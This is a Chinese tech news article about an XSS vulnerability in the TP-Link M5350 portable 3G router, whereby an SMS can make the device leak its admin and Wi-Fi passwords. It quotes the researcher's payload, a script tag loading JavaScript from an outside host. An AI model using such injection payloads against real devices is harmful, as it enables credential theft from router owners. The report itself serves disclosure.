神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

简介: 本文讲的是神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码,TP-Link的设备漏洞库又增新丁。 这次的主角是TP-Link M5350,一款便携式3G路由器。
本文讲的是 神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码TP-Link的设备漏洞库又增新丁。

这次的主角是TP-Link M5350,一款便携式3G路由器。

Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

这是条什么短信呢?

<script src=//n.ms/a.js></script>
(不用试,研究员早把脚本下线了)

神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

漏洞效果图

懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。

作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。

听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。

比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。




原文发布时间为:2017年4月12日
本文作者:longye
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
数据安全/隐私保护 Android开发 iOS开发
一日一技:macOS如何找回已经连接的Wi-Fi密码?
一日一技:macOS如何找回已经连接的Wi-Fi密码?
219 0
一日一技:macOS如何找回已经连接的Wi-Fi密码?
|
运维 安全 Linux
6步教你封杀恶意登录服务器的ip
6步教你封杀恶意登录服务器的ip
751 0
6步教你封杀恶意登录服务器的ip
|
安全 数据安全/隐私保护
香港WiFi无线网存漏洞 近5成十分钟内可破解
2月24日消息,据香港媒体报道,在香港地区超过三万个WiFi无线网络热点中,有近5成可以在十分钟内破解。 WiFi全称Wireless Fidelity,属于在办公室和家庭中使用的短距离无线技术,是目前无线接入的主流标准之一。
1174 0
|
网络安全 数据安全/隐私保护 网络虚拟化
|
Web App开发 关系型数据库 MySQL
实用教程:快速搭建Wi-Fi钓鱼热点
本文讲的是实用教程:快速搭建Wi-Fi钓鱼热点,在本教程中,我们将创建一个由恶意Wi-Fi接入点提供的网络钓鱼页面。如果受害者在此页面中输入其详细信息,则将直接发送给您。
3294 0
|
安全 数据安全/隐私保护 网络架构
Humax WiFi路由器被爆0day漏洞,可获得管理员权限
本文讲的是Humax WiFi路由器被爆0day漏洞,可获得管理员权限,最近,在2017年5月,来自Trustwave SpiderLabs的Felipe Cerqueira和Thiago Musa在HUMAX WiFi路由器型号HG-100R *中发现了一个远程漏洞。
1874 0